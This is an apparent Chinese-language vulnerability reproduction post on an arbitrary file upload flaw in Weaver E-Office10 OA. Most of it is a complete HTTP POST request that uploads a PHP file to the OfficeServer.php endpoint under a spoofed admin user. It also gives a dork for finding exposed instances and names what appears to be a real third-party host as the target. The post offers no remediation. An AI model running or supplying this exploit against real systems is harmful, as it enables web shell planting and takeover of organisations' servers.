【漏洞左先锋】【OA漏洞】泛微OA E-Office10 任意文件上传

漏洞描述

泛微OA eoffice10 指定路径可上传任意文件 /eoffice10/server/public/iWebOffice2015/OfficeServer.php

影响版本

泛微 eoffice10

网络空间搜索

搜索语法：eoffice10

漏洞复现

站点主页

查看eoffice版本 访问接口 /eoffice10/version.json

文件上传

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: mail.yselec.hk:8010
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Length: 402

------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition:form-data;name="FileData";filename="uploadcat.php"
Content-Type:application/octet-stream

<?php echo md5(1);?>
------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition:form-data;name="FormData"

{'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'uploaddot.php'}
------WebKitFormBoundaryLpoiBFy4ANA8daew--

发送数据包，返回200，访问上传路径

上传成功